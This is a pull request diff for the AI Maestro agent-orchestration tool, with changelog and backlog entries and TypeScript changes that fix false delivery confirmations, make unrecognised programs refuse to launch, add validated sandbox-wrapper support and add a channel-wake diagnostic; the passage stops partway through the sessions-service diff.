### PR TITLE
fix: four findings from a 50-agent production field report (v0.37.7)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -3,6 +3,34 @@
 All notable changes to AI Maestro are documented in this file.
 Format follows [Keep a Changelog](https://keepachangelog.com/).
 
+## [0.37.7] - 2026-09-02 — Field report from a 50-agent estate: four of five findings
+
+A production estate (3Metas, ~50 agents across three hosts) reported five findings from one day of use. Four are fixed here; the fifth is a missing capability and is designed and logged rather than half-built. Every one of the four is the same shape this subsystem keeps producing: **a component reporting something it had not earned.**
+
+### Fixed
+
+- **A wake that stages text in the input box was reported as delivered.** `capture-pane` includes the agent's input box, and the readback looked for the message *anywhere* on the pane — so text typed into an agent and never submitted read back exactly like text the agent had received. The pane adapter returned `confirmed`, which additionally suppressed the retry that would have rescued it. Reported cost: **eight of nine agents on one host holding staged, unsubmitted text, one of them for about eleven hours**, with `stop_reason=end_turn`, clean turn durations and a moving `lastActive` throughout. Seven were recoverable wake nudges — the mail was still in the inbox. **One was a real instruction with no inbox copy, and it was lost.** Proof of delivery is now proof of *submission*: the message must appear **above** the input box, where a TUI echoes what it accepted. Text found still in the box is reported as `staged` — positive evidence of non-delivery, distinct from "unknown" — and routed to the retry queue.
+- **Recovery now clears before retyping.** The reporter measured it: Enter once fails, Enter twice fails, **clear-and-retype then Enter succeeds 7 of 7**. Typing again on top of staged text just produces a doubled line. Resends send `C-u` first.
+- **The pane route reports `failed`, not `unavailable`, when it typed and the text did not take.** `unavailable` means "this route does not apply"; using it for a route that applied and failed hides a real fault behind a word that means nothing to see here.
+- **An unrecognised `program` no longer silently becomes bare Claude Code.** The resolver ended in `return 'claude'`, so any value it did not recognise launched plain Claude Code — the worst possible default, because the one configuration that must never launch bare (a sandboxed wrapper) is exactly what an unrecognised name produced. `lib/program-command.ts` now returns an error and **refuses to launch**, and the wake reports `programStarted: false` with the reason. This also removes a second, slightly different copy of the same ladder in the session-create path.
+
+### Added
+
+- **Wrapper scripts as `program`.** An agent that reads untrusted external mail can now point `program` at an absolute path to an executable — e.g. a `sandbox-exec` wrapper. Previously `program` was a closed whitelist, so the only way to sandbox an agent was to wake with `startProgram:false` and launch it by hand, which held until the next ordinary wake started the program **unsandboxed with nothing to warn anyone**. The reporter built a detector because they could not build a preventer. Wrapper paths are validated (absolute, exists, executable, no shell metacharacters, no whitespace) because `program` is interpolated into a shell command line. A wrapper whose name contains `claude` is treated as Claude Code for flag purposes, so it keeps `--permission-mode`, telemetry and `--channels` — losing `--permission-mode` on a sandboxed agent would be a silent downgrade of exactly the agent that needs it.
+- **A `channel-wake` startup diagnostic.** The channel route injects a real turn with no keystrokes and is the only one that works cleanly on an idle agent — and on both of the reporter's hosts `~/.aimaestro/channels/` did not exist. Not empty: **absent.** Nothing was broken and nothing lied; the adapter correctly reports `unavailable` and delivery falls back to the pane. But it was invisible, and cost a day to discover. Startup now says out loud how many online agents have a channel, how many are proven by ack, and which of the three preconditions is missing — including whether `AIMAESTRO_CHANNEL_FLAG` is even set.
+
+### Not fixed — designed and logged
+
+- **Agents cannot run as separate OS users** (`docs/BACKLOG.md` #20). Every agent runs as whoever started the server, so a correctly-scoped per-repo deploy key protects nothing at the filesystem level — `git` refused the reporter's agent access to a repository it then read as a plain directory. There is no `user`/`uid`/`runAs` field anywhere: a missing capability, not a misconfiguration. The fix crosses a privilege boundary (sudoers per agent user, per-user tmux sockets, per-user `$HOME` and AMP home, ~50 existing agents to migrate, two production hosts differing in all of it). **A `runAs` field that appears to isolate and does not would be precisely the defect class this entire release is about**, so it is designed in the backlog rather than shipped unverified. The new wrapper support is a real interim mitigation for the untrusted-input case.
+
+### Upstream (separate repo, not in this release)
+
+- **A read command rewrote the identity of the agent it read** — [agentmessaging/claude-plugin#26](https://github.com/agentmessaging/claude-plugin/pull/26), open and green. `amp-inbox.sh --id <other>` run from an agent session rewrote the target's config to the caller's name and dropped the target's id, and separately `--id` was ignored outright whenever `AMP_DIR` was exported. The reporter ranked it first, correctly: *"it changes the system while appearing to observe it, and it cannot be audited around, because the audit is what causes it."* An agents manager sweeping the fleet to check for identity corruption would have renamed every agent it inspected. **That fix reaches the hosts only after #26 merges and the plugin is rebuilt.**
+
+### Notes
+- Verified against the live registry before changing the program resolver: 75 `claude-code`, 8 `Claude Code`, 1 `none`, 1 unset — all still resolve.
+- 1066 tests (up from 1017): 11 pinning submitted-vs-staged, 5 the staged recovery flow, 33 the program resolver including command-injection refusals. Upstream: 11 new bats tests, 9 of which fail against the previous code.
+
 ## [0.37.6] - 2026-08-28 — Backlog: deferred ideas from the competitor benchmarks
 
 ### Added

--- a/README.md
+++ b/README.md
@@ -8,7 +8,7 @@
 
 **The OS for AI-first organizations — orchestrate any AI agent with persistent memory, agent-to-agent messaging, and multi-machine support.**
 
-[![Version](https://img.shields.io/badge/version-0.37.6-blue)](https://github.com/23blocks-OS/ai-maestro/releases)
+[![Version](https://img.shields.io/badge/version-0.37.7-blue)](https://github.com/23blocks-OS/ai-maestro/releases)
 [![Platform](https://img.shields.io/badge/platform-macOS%20%7C%20Linux%20%7C%20Windows%20(WSL2)-lightgrey)](https://github.com/23blocks-OS/ai-maestro)
 [![License](https://img.shields.io/badge/license-MIT-green)](./LICENSE)
 [![GitHub Stars](https://img.shields.io/github/stars/23blocks-OS/ai-maestro?style=social)](https://github.com/23blocks-OS/ai-maestro)

--- a/docs/BACKLOG.md
+++ b/docs/BACKLOG.md
@@ -3,7 +3,7 @@
 **Purpose:** This document tracks planned features, improvements, and ideas for AI Maestro. Items are prioritized into three categories: Now (next release), Next (upcoming releases), and Later (future considerations).
 
 **Last Updated:** 2026-08-28
-**Current Version:** v0.37.6
+**Current Version:** v0.37.7
 
 ---
 
@@ -691,6 +691,43 @@ Add "Memory" tab to AI Maestro dashboard:
 ---
 
 ## Next (v0.6.x)
+
+### 20. Per-OS-User Agent Isolation (`runAs`)
+
+**Status:** Planned — **design only, deliberately not shipped in 0.37.7**
+**Priority:** High
+**Effort:** Large (full cycle, plus per-host provisioning)
+**Source:** Field report, 3Metas, 2 September 2026 (finding #5)
+
+**Problem:**
+Every agent on a host runs as the same OS account — whoever started the server. A correctly-scoped per-repo deploy key therefore protects nothing at the filesystem level: the reporter's agent was refused access to a repository by `git`, and then read the same repository as a plain directory.
+
+Grepping the create payload confirms it: there is no `user`, `uid`, `runAs` or `asUser` field anywhere. This is a **missing capability, not a misconfiguration**.
+
+**Consequence:** any agent on a shared host reads every other agent's working data, whatever the credentials say. For an agent exposed to untrusted input this is the difference between two legs of the prompt-injection trifecta and all three.
+
+**Why it was not fixed alongside the other four findings:**
+
+Everything else in that report was a component reporting something it had not earned. This one is a capability that does not exist, and the fix crosses a privilege boundary:
+
+- `tmux new-session` as another user needs the server to hold privilege it does not have today — root, or a narrow `sudoers` NOPASSWD entry per agent user, provisioned on every host.
+- The web terminal attaches with `tmux attach` **as the server user**; attaching to another user's session means another user's socket and another set of permissions on it.
+- Each agent user needs its own `$HOME`, `~/.agent-messaging`, `~/.claude`, and ownership of its working directory — which is also the migration problem for ~50 existing agents.
+- macOS and Linux differ in user creation, socket permissions and launch context, and both hosts are in production.
+
+A `runAs` field that appears to isolate and does not would be the exact defect class this whole report is about: a control reporting protection it does not provide. Shipping it unverified is worse than not shipping it.
+
+**Proposed design:**
+
+1. `runAs?: string` on the agent record — an OS username. Absent means today's behaviour, unchanged.
+2. Session launch becomes `sudo -u <runAs> tmux -S <per-user socket> new-session …`, gated on a preflight that verifies the sudoers entry exists and the socket directory is traversable. **Preflight failure refuses to launch** — same rule as the program resolver in 0.37.7: refuse rather than silently do the unisolated thing.
+3. The PTY bridge attaches through the same `sudo -u`.
+4. A provisioning script creates the user, its AMP home, and its sudoers fragment, because per the reporter's own note the estate does not add machines or accounts by hand.
+5. A diagnostic check that reports, per host: how many agents declare `runAs`, and how many of those actually resolved — so the gap between intent and reality is visible rather than assumed.
+
+**Interim mitigation available today:** wrapper programs (0.37.7, backlog #17-adjacent) let an agent run under `sandbox-exec` or an equivalent, which addresses the untrusted-input case without the user boundary. It is narrower — it constrains the one agent rather than isolating all of them from each other — but it is real, and unlike the previous workaround it survives a wake.
+
+---
 
 ### 15. QR-Code Pairing for Mobile App → Host Registration
 

--- a/lib/notification-service.ts
+++ b/lib/notification-service.ts
@@ -44,6 +44,12 @@ export interface NotificationResult {
   notified: boolean       // True if the notification reached the pane
   verified?: boolean      // True if we READ IT BACK off the pane (real proof)
   reason?: string         // Why notification was skipped (if notified=false)
+  /**
+   * We actually typed into the pane. Distinguishes "this route does not apply"
+   * (no session, remote host, disabled) from "this route applies and failed" —
+   * which the wake chain reports as `unavailable` vs `failed`.
+   */
+  attempted?: boolean
   error?: string          // Error message (if success=false)
 }
 
@@ -66,6 +72,17 @@ const NOTIFICATION_VERIFY_DELAY_MS = 250
 const NOTIFICATION_MAX_SENDS = 2             // initial + one resend
 const NOTIFICATION_CAPTURE_LINES = 120
 
+// Recovery for text that reached the input box and was never submitted.
+//
+// Reported from a 50-agent estate: eight of nine agents on one host held
+// staged, unsubmitted text, one of them for about eleven hours, while every
+// indicator stayed green. Sending Enter again does not rescue it — the
+// reporter measured Enter once and Enter twice both failing, and
+// clear-then-retype-then-Enter succeeding 7 of 7. So recovery clears the input
+// line first and types the text again as fresh keystrokes.
+const NOTIFICATION_CLEAR_INPUT_KEY = 'C-u'   // kill-line: empties the input box
+const NOTIFICATION_CLEAR_SETTLE_MS = 80
+
 // Body appended to the pane notification. Kept short and single-lined: a raw
 // newline inside send-keys would submit the TUI early (and open an unterminated
 // quote at a shell prompt), truncating the message at the first line break.
@@ -78,6 +95,13 @@ interface PaneDeliveryResult {
   verified: boolean
   /** The runtime can't be captured, so absence of proof isn't proof of absence. */
   unverifiable: boolean
+  /**
+   * We can see our text sitting in the agent's input box, unsubmitted. This is
+   * strictly worse than "unknown": it is positive evidence of NON-delivery, and
+   * it is the state that had eight of nine agents on one host holding staged
+   * text while everything reported healthy.
+   */
+  staged: boolean
 }
 
 /**
@@ -110,6 +134,58 @@ export function toSingleLine(text: string, max: number): string {
 function paneContains(pane: string, needle: string): boolean {
   const strip = (s: string) => s.replace(/\s+/g, '')
   return strip(pane).includes(strip(needle))
+}
+
+/**
+ * A line that is the agent's input prompt, after stripping the box-drawing
+ * chrome TUIs wrap it in (`│ > `, `╭─`, and friends).
+ *
+ * Matches Claude Code and Codex (`>`), fish/starship-style prompts (`❯`), and
+ * a bare shell (`$`, `%`). Kept deliberately loose: a false positive costs one
+ * unnecessary resend, a false negative costs a lost message.
+ */
+const INPUT_PROMPT_LINE = /^[\s│┃|╎┆:]*[>❯$%⏵]\s?/
+
+/**
+ * Split a captured pane into what the agent has ACCEPTED and what is still
+ * sitting in its input box.
+ *
+ * This distinction is the whole point. `capture-pane` shows the input box, so
+ * text typed into an agent and never submitted reads back exactly like text the
+ * agent received — which is how a readback check that looked for the message
+ * anywhere on the pane returned `confirmed` for eight agents that were deaf.
+ * The input box is the tail of the pane from its last prompt line onward.
+ */
+export function splitPaneAtInput(pane: string): { accepted: string; input: string } {
+  const lines = pane.split('\n')
+  let promptAt = -1
+  for (let i = lines.length - 1; i >= 0; i--) {
+    if (INPUT_PROMPT_LINE.test(lines[i])) {
+      promptAt = i
+      break
+    }
+  }
+  if (promptAt === -1) return { accepted: pane, input: '' }
+  return {
+    accepted: lines.slice(0, promptAt).join('\n'),
+    input: lines.slice(promptAt).join('\n'),
+  }
+}
+
+/**
+ * Proof of submission, not merely of presence.
+ *
+ * The needle must appear ABOVE the input box. A TUI echoes a submitted prompt
+ * into the transcript above its input, so "above" is what submission looks
+ * like; "in the box" is what a lost Enter looks like.
+ */
+export function paneSubmitted(pane: string, needle: string): boolean {
+  return paneContains(splitPaneAtInput(pane).accepted, needle)
+}
+
+/** Our text is in the input box, unsubmitted — positive evidence of failure. */
+export function paneStaged(pane: string, needle: string): boolean {
+  return paneContains(splitPaneAtInput(pane).input, needle)
 }
 
 /**
@@ -147,27 +223,48 @@ async function sendTmuxNotification(
   const isTui = hasHookReport(sessionName)
   const payload = isTui ? message : `echo '${message.replace(/'/g, "'\\''")}'`
   let sawPane = false
+  let staged = false
 
   for (let send = 1; send <= NOTIFICATION_MAX_SENDS; send++) {
+    // A resend after staged text must CLEAR the input box first. Typing again
+    // on top of what is already there produces a doubled line that submits as
+    // garbage, and re-sending Enter alone does not rescue it — both measured in
+    // the field. Clear, retype, then Enter.
+    if (staged) {
+      await runtime.sendKeys(target, NOTIFICATION_CLEAR_INPUT_KEY)
+      await new Promise(resolve => setTimeout(resolve, NOTIFICATION_CLEAR_SETTLE_MS))
+    }
+
     await runtime.sendKeys(target, payload, { literal: true })
     await new Promise(resolve => setTimeout(resolve, NOTIFICATION_SUBMIT_DELAY_MS))
     await runtime.sendKeys(target, 'Enter')
 
+    staged = false
     for (let poll = 0; poll < NOTIFICATION_VERIFY_POLLS; poll++) {
       await new Promise(resolve => setTimeout(resolve, NOTIFICATION_VERIFY_DELAY_MS))
       const pane = await runtime.capturePane(target, NOTIFICATION_CAPTURE_LINES).catch(() => '')
-      if (pane) sawPane = true
-      if (pane && paneContains(pane, needle)) {
-        return { sent: true, verified: true, unverifiable: false }
+      if (!pane) continue
+      sawPane = true
+
+      // Above the input box = the agent took it. This is the only proof.
+      if (paneSubmitted(pane, needle)) {
+        return { sent: true, verified: true, unverifiable: false, staged: false }
+      }
+
+      // In the input box = the Enter did not take. Stop polling; more waiting
+      // will not submit it, and the next send needs to clear first.
+      if (paneStaged(pane, needle)) {
+        staged = true
+        break
       }
     }
 
     // Never captured anything at all: this runtime doesn't support readback, so
     // resending would just double-deliver against a check that can't succeed.
-    if (!sawPane) return { sent: true, verified: false, unverifiable: true }
+    if (!sawPane) return { sent: true, verified: false, unverifiable: true, staged: false }
   }
 
-  return { sent: true, verified: false, unverifiable: false }
+  return { sent: true, verified: false, unverifiable: false, staged }
 }
 
 /**
@@ -280,11 +377,35 @@ export async function notifyAgent(options: NotificationOptions): Promise<Notific
       return { success: true, notified: true, verified: false, reason: 'Runtime cannot verify' }
     }
 
+    if (result.staged) {
+      // The strongest negative signal available: our text is visibly sitting in
+      // the agent's input box, unsubmitted, after a clear-and-retype. Say so
+      // precisely — "not seen in pane" would suggest the opposite problem and
+      // send whoever reads the log looking in the wrong place.
+      console.warn(
+        `[Notify] ✗ Notification to ${agentName} is STAGED in the input box, not submitted ` +
+          `(after ${NOTIFICATION_MAX_SENDS} sends). The agent has not seen it.`
+      )
+      return {
+        success: true,
+        notified: false,
+        verified: false,
+        attempted: true,
+        reason: 'Staged in input box, never submitted',
+      }
+    }
+
     // We could read the pane and the message never showed up after a resend.
     // Report honestly so the caller can retry or surface it, rather than
     // recording a delivery that never happened.
     console.warn(`[Notify] ✗ Notification to ${agentName} not seen in pane after ${NOTIFICATION_MAX_SENDS} sends`)
-    return { success: true, notified: false, verified: false, reason: 'Not seen in pane after retries' }
+    return {
+      success: true,
+      notified: false,
+      verified: false,
+      attempted: true,
+      reason: 'Not seen in pane after retries',
+    }
 
   } catch (error) {
     const errorMessage = error instanceof Error ? error.message : 'Unknown error'

--- a/lib/program-command.ts
+++ b/lib/program-command.ts
@@ -1,0 +1,131 @@
+/**
+ * Resolving an agent's configured `program` to the command that actually runs.
+ *
+ * Two things were wrong with the ladder this replaces.
+ *
+ * 1. It was a closed whitelist of names, so `program` could never point at a
+ *    wrapper script. An agent that reads untrusted external mail and must run
+ *    inside `sandbox-exec` had no way to say so. The workaround in the field was
+ *    to wake with `startProgram:false` and launch the wrapped program by hand —
+ *    which works right up until the next ordinary wake starts the program
+ *    UNSANDBOXED, with nothing to warn anyone. A detector was built because a
+ *    preventer could not be.
+ *
+ * 2. Its fallback was `return 'claude'`. Any value it did not recognise silently
+ *    became plain Claude Code. That is the worst possible default for the case
+ *    above: the one configuration that must not launch bare is exactly the one
+ *    an unrecognised name produced.
+ *
+ * So: wrappers are first-class, and an unresolvable program is an error that
+ * refuses to launch rather than a guess that launches the wrong thing.
+ */
+
+import fs from 'fs'
+import os from 'os'
+import path from 'path'
+
+export type ProgramKind = 'claude' | 'codex' | 'aider' | 'cursor' | 'gemini' | 'opencode' | 'openclaw' | 'wrapper'
+
+export interface ResolvedProgram {
+  /** Shell-ready command to launch, or null if it could not be resolved. */
+  command: string | null
+  /**
+   * What the command behaves like. Drives claude-specific flags
+   * (--permission-mode, telemetry env, --channels), which a wrapper around
+   * Claude Code still wants.
+   */
+  kind: ProgramKind | null
+  /** Why it could not be resolved. Present iff command is null. */
+  error?: string
+}
+
+/** Characters that would let a `program` value break out of the launch command. */
+const SHELL_METACHARACTERS = /[;&|`$(){}<>\n\r'"\\*?[\]!#~]/
+
+/** A wrapper is anything that looks like a path rather than a bare name. */
+function looksLikePath(program: string): boolean {
+  return program.startsWith('/') || program.startsWith('~/') || program.startsWith('./')
+}
+
+function expandHome(p: string): string {
+  return p.startsWith('~/') ? path.join(os.homedir(), p.slice(2)) : p
+}
+
+/**
+ * Resolve a wrapper path.
+ *
+ * Deliberately strict: it must be an absolute (or ~-rooted) path to a file that
+ * exists and is executable, with no shell metacharacters. `program` is written
+ * into a shell command line, so anything looser is a command-injection hole,
+ * and a wrapper that is missing or non-executable must fail loudly here rather
+ * than at wake time inside a tmux pane nobody is watching.
+ */
+function resolveWrapper(program: string): ResolvedProgram {
+  if (SHELL_METACHARACTERS.test(program)) {
+    return { command: null, kind: null, error: `program path contains shell metacharacters: ${program}` }
+  }
+  if (/\s/.test(program)) {
+    return { command: null, kind: null, error: `program path contains whitespace: ${program}` }
+  }
+  if (program.startsWith('./')) {
+    return {
+      command: null,
+      kind: null,
+      error: `program path must be absolute (or ~/-rooted); relative paths depend on the launch cwd: ${program}`,
+    }
+  }
+
+  const resolved = expandHome(program)
+  try {
+    const stat = fs.statSync(resolved)
+    if (!stat.isFile()) {
+      return { command: null, kind: null, error: `program path is not a file: ${resolved}` }
+    }
+    fs.accessSync(resolved, fs.constants.X_OK)
+  } catch {
+    return { command: null, kind: null, error: `program path is missing or not executable: ${resolved}` }
+  }
+
+  // A wrapper around Claude Code still wants Claude's flags. Naming is the
+  // signal, matching how the bare names below are matched: call it
+  // `claude-sandboxed.sh` and it is treated as claude.
+  const base = path.basename(resolved).toLowerCase()
+  const kind: ProgramKind = base.includes('claude') ? 'claude' : 'wrapper'
+  return { command: resolved, kind }
+}
+
+/**
+ * Resolve `program` to a launchable command.
+ *
+ * Returns `{ command: null, error }` for anything unresolvable. Callers must
+ * NOT substitute a default — that was the old bug.
+ */
+export function resolveProgramCommand(program: string): ResolvedProgram {
+  const p = (program || '').trim()
+  if (!p) return { command: null, kind: null, error: 'no program configured' }
+
+  if (looksLikePath(p)) return resolveWrapper(p)
+
+  const lower = p.toLowerCase()
+  if (lower.includes('claude')) return { command: 'claude', kind: 'claude' }
+  if (lower.includes('codex')) return { command: 'codex', kind: 'codex' }
+  if (lower.includes('aider')) return { command: 'aider', kind: 'aider' }
+  if (lower.includes('cursor')) return { command: 'cursor', kind: 'cursor' }
+  if (lower.includes('gemini')) return { command: 'gemini', kind: 'gemini' }
+  if (lower.includes('opencode')) return { command: 'opencode', kind: 'opencode' }
+  if (lower.includes('openclaw')) return { command: 'openclaw', kind: 'openclaw' }
+
+  return {
+    command: null,
+    kind: null,
+    error:
+      `unrecognised program "${p}". Use a known name (claude, codex, aider, cursor, gemini, ` +
+      `opencode, openclaw) or an absolute path to an executable wrapper.`,
+  }
+}
+
+/** True for the two values that mean "give me a shell, launch nothing". */
+export function isNoProgram(program: string): boolean {
+  const lower = (program || '').trim().toLowerCase()
+  return lower === 'none' || lower === 'terminal'
+}

--- a/lib/wake-chain.ts
+++ b/lib/wake-chain.ts
@@ -191,6 +191,11 @@ export const paneAdapter: WakeAdapter = {
     })
     if (res.verified) return { adapter: 'pane', status: 'confirmed' }
     if (res.notified) return { adapter: 'pane', status: 'sent', detail: res.reason }
+    // We typed into the pane and it did not take — most sharply when the text
+    // is still sitting in the input box. That is the route failing, not the
+    // route being inapplicable, and calling it `unavailable` would hide a real
+    // fault behind a word that means "nothing to see here".
+    if (res.attempted) return { adapter: 'pane', status: 'failed', detail: res.reason || res.error }
     // notifyAgent never throws for an absent agent/session; it reports why.
     return { adapter: 'pane', status: 'unavailable', detail: res.reason || res.error }
   },

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "ai-maestro",
-  "version": "0.37.6",
+  "version": "0.37.7",
   "description": "Web dashboard for orchestrating multiple AI coding agents with hierarchical organization and real-time terminals",
   "author": "Juan Peláez <juan@23blocks.com> (https://23blocks.com)",
   "license": "MIT",

--- a/services/agents-core-service.ts
+++ b/services/agents-core-service.ts
@@ -66,6 +66,7 @@ import { initAgentAMPHome, getAgentAMPDir } from '@/lib/amp-inbox-writer'
 import { initializeAllAgents, getStartupStatus } from '@/lib/agent-startup'
 import { sessionActivity, agentActivity } from '@/services/shared-state'
 import { getRuntime } from '@/lib/agent-runtime'
+import { resolveProgramCommand, isNoProgram, type ResolvedProgram } from '@/lib/program-command'
 import {
   capturePaneFromContainer,
   inspectContainerStatus,
@@ -256,22 +257,15 @@ function sanitizeArgs(args: string): string {
   return args.replace(/[^a-zA-Z0-9\s\-_.=/:,~@]/g, '').trim()
 }
 
-/** Resolve program name to CLI command */
-function resolveStartCommand(program: string): string {
-  if (program.includes('claude') || program.includes('claude code')) {
-    return 'claude'
-  } else if (program.includes('codex')) {
-    return 'codex'
-  } else if (program.includes('aider')) {
-    return 'aider'
-  } else if (program.includes('cursor')) {
-    return 'cursor'
-  } else if (program.includes('gemini')) {
-    return 'gemini'
-  } else if (program.includes('opencode')) {
-    return 'opencode'
-  }
-  return 'claude' // Default
+/**
+ * Resolve program name to CLI command.
+ *
+ * Delegates to lib/program-command, which supports wrapper scripts and — the
+ * important part — returns null rather than defaulting to `claude` for a value
+ * it does not recognise. See that module for why the old default was dangerous.
+ */
+function resolveStartCommand(program: string): ResolvedProgram {
+  return resolveProgramCommand(program)
 }
 
 /**
@@ -1643,6 +1637,8 @@ export async function wakeAgent(agentId: string, params: WakeAgentParams): Promi
   woken: boolean
   alreadyRunning?: boolean
   programStarted?: boolean
+  /** Why no program was started, when programStarted is false but the agent woke. */
+  programError?: string
   message: string
 }>> {
   try {
@@ -1828,14 +1824,44 @@ export async function wakeAgent(agentId: string, params: WakeAgentParams): Promi
       const program = (programOverride || agent.program || 'claude code').toLowerCase()
       console.log(`[Wake] Final program selection: "${program}" (override: ${programOverride}, agent.program: ${agent.program})`)
 
-      if (program === 'none' || program === 'terminal') {
+      if (isNoProgram(program)) {
         // Export env vars for terminal-only mode
         try {
           await runtime.sendKeys(sessionName, `"export AMP_DIR='${ampDir}' AIM_AGENT_NAME='${agentName}' AIM_AGENT_ID='${agentId}'; unset CLAUDECODE"`, { enter: true })
         } catch { /* non-fatal */ }
         console.log(`[Wake] Terminal only mode - no AI program started`)
       } else {
-        let startCommand = resolveStartCommand(program)
+        const resolved = resolveStartCommand(program)
+
+        if (!resolved.command) {
+          // Refuse rather than guess. The old ladder returned 'claude' for
+          // anything it did not recognise, which meant a misconfigured or
+          // missing wrapper — the one case where launching bare Claude Code is
+          // unacceptable — silently launched bare Claude Code.
+          console.error(`[Wake] Not starting a program for ${agentName}: ${resolved.error}`)
+          updateAgentSessionInRegistry(agentId, sessionIndex, 'online', workingDirectory, true)
+          return {
+            data: {
+              success: true,
+              agentId,
+              name: agentName,
+              sessionName,
+              sessionIndex,
+              workingDirectory,
+              projectDirectory: params.projectDirectory,
+              hooksExecuted: false,
+              woken: true,
+              programStarted: false,
+              programError: resolved.error,
+              message:
+                `Agent "${agentName}" session ${sessionIndex} is awake, but no program was started: ` +
+                `${resolved.error}`,
+            },
+            status: 200,
+          }
+        }
+
+        const startCommand = resolved.command
 
         // Build full command with programArgs and model
         let fullCommand = startCommand
@@ -1849,8 +1875,11 @@ export async function wakeAgent(agentId: string, params: WakeAgentParams): Promi
           fullCommand = `${fullCommand} --model ${agent.model}`
         }
 
-        // Inject --permission-mode for claude-based programs
-        if (startCommand === 'claude') {
+        // Inject --permission-mode for claude-based programs. Keyed off the
+        // resolved KIND, not the literal command, so a wrapper named
+        // e.g. claude-sandboxed.sh still gets Claude Code's flags — losing
+        // --permission-mode on a sandboxed agent would be a silent downgrade.
+        if (resolved.kind === 'claude') {
           const effectiveMode = params.permissionMode || agent.permissionMode || 'supervised'
           if (effectiveMode !== 'supervised') {
             const cliMode = PERMISSION_MODE_TO_CLI[effectiveMode]
@@ -1860,7 +1889,7 @@ export async function wakeAgent(agentId: string, params: WakeAgentParams): Promi
           // Give Claude Code the agent's native session name (opt-in via
           // AIMAESTRO_SESSION_NAME). Surfaces in the statusline session_name
           // field, terminal title, and `claude --resume <name>`.
-          fullCommand = `${fullCommand}${claudeSessionNameFlag(agentName, startCommand)}`
+          fullCommand = `${fullCommand}${claudeSessionNameFlag(agentName, 'claude')}`
 
           // Channels: reliable idle-agent wake via MCP turn-injection. When
           // AIMAESTRO_CHANNEL_FLAG is set, the agent boots with the amp channel so
@@ -1890,7 +1919,7 @@ export async function wakeAgent(agentId: string, params: WakeAgentParams): Promi
 
           // Opt-in OTLP telemetry: export claude_code.* metrics to AI Maestro's
           // receiver, correlated to this agent via session.id (off by default).
-          fullCommand = `${claudeTelemetryEnvPrefix(startCommand)}${fullCommand}`
+          fullCommand = `${claudeTelemetryEnvPrefix('claude')}${fullCommand}`
         }
 
         // Small delay to let the session initialize

--- a/services/diagnostics-service.ts
+++ b/services/diagnostics-service.ts
@@ -24,6 +24,7 @@ import path from 'path'
 import os from 'os'
 import { getHosts, isSelf } from '@/lib/hosts-config'
 import { loadAgents } from '@/lib/agent-registry'
+import { hasChannel, isChannelVerified } from '@/lib/channel-bridge.mjs'
 import { loadKeyPair } from '@/lib/amp-keys'
 import { deriveDidKey } from '@/lib/amp-did'
 import { type ServiceResult } from '@/services/service-errors'
@@ -192,6 +193,71 @@ function checkAMPIdentityIntegrity(): DiagnosticCheck {
   }
 }
 
+/**
+ * Is the reliable wake route actually available to the fleet?
+ *
+ * The channel route injects a real turn with no keystrokes, which is the only
+ * thing that works cleanly on an idle agent — the pane route has to type into
+ * a TUI and can be defeated by its input state. When a session did not register
+ * the channel server, the adapter reports `unavailable` and delivery quietly
+ * falls back to the pane. That is correct behaviour and it lies to nobody, but
+ * it is invisible: an estate of ~50 agents ran for months on the fallback
+ * without knowing the better route had never been opened, and lost a day to it.
+ *
+ * So: say it out loud, once, at startup. Three preconditions can block it and
+ * none is settable from a crew host — the --channels flag (AIMAESTRO_CHANNEL_FLAG
+ * here), the plugin being on the Anthropic allowlist, and channelsEnabled for
+ * the org.
+ */
+function checkChannelWake(): DiagnosticCheck {
+  try {
+    const online = loadAgents().filter(
+      (a: any) => !a.deletedAt && a.sessions?.some((sess: any) => sess.status === 'online')
+    )
+    if (online.length === 0) {
+      return { name: 'channel-wake', status: 'pass', message: 'No online agents' }
+    }
+
+    const registered = online.filter((a: any) => hasChannel(a.id))
+    const verified = registered.filter((a: any) => isChannelVerified(a.id))
+    const flagSet = !!process.env.AIMAESTRO_CHANNEL_FLAG
+
+    if (registered.length === 0) {
+      return {
+        name: 'channel-wake',
+        status: 'warn',
+        message:
+          `Channel delivery unavailable for all ${online.length} online agent(s) — no session has registered a channel. ` +
+          `Waking falls back to typing into the tmux pane. ` +
+          (flagSet
+            ? 'AIMAESTRO_CHANNEL_FLAG is set, so the remaining preconditions are the plugin allowlist and channelsEnabled for the org.'
+            : 'AIMAESTRO_CHANNEL_FLAG is NOT set, so agents boot without --channels and cannot register one.'),
+        details: { online: online.length, registered: 0, verified: 0, channelFlagSet: flagSet },
+      }
+    }
+
+    const status: DiagnosticStatus = verified.length === registered.length ? 'pass' : 'warn'
+    return {
+      name: 'channel-wake',
+      status,
+      message:
+        `${registered.length}/${online.length} online agent(s) have a channel, ${verified.length} proven by ack` +
+        (verified.length < registered.length
+          ? ' — unacked channels still fall back to the pane, which is correct but slower and noisier'
+          : ''),
+      details: {
+        online: online.length,
+        registered: registered.length,
+        verified: verified.length,
+        channelFlagSet: flagSet,
+        unregistered: online.filter((a: any) => !hasChannel(a.id)).map((a: any) => a.name),
+      },
+    }
+  } catch (error: any) {
+    return { name: 'channel-wake', status: 'warn', message: `Could not verify: ${error.message}` }
+  }
+}
+
 function checkNodeVersion(): DiagnosticCheck {
   const version = process.version
   const major = parseInt(version.slice(1).split('.')[0], 10)
@@ -344,6 +410,7 @@ export async function runDiagnostics(): Promise<ServiceResult<DiagnosticReport>>
   checks.push(tmux, nodePty)
   checks.push(checkAgentRegistry())
   checks.push(checkAMPIdentityIntegrity())
+  checks.push(checkChannelWake())
   checks.push(checkNodeVersion())
   checks.push(diskSpace)
 

--- a/services/sessions-service.ts
+++ b/services/sessions-service.ts
@@ -36,6 +36,7 @@ import { initAgentAMPHome, getAgentAMPDir } from '@/lib/amp-inbox-writer'
 import { sessionActivity, agentActivity, terminalSessions, hookStatus as hookStatusMap, broadcastStatusUpdate, broadcastChatEvent } from '@/services/shared-state'
 import { isSessionIdle, IDLE_THRESHOLD_MS } from '@/lib/session-idle'
 import { getRuntime } from '@/lib/agent-runtime'
+import { resolveProgramCommand, isNoProgram } from '@/lib/program-command'
 import crypto from 'crypto'
 import { type ServiceResult, missingField, notFound, alreadyExists, invalidField, operationFailed, serviceError } from '@/services/service-errors'
 
@@ -762,31 +763,33 @@ export async function createSession(params: CreateSessionParams): Promise<Servic
     console.warn(`[Sessions] Could not set up AMP for ${agentName}:`, ampError)
   }
 
-  // Launch program
-  const selectedProgram = (program || 'claude-code').toLowerCase()
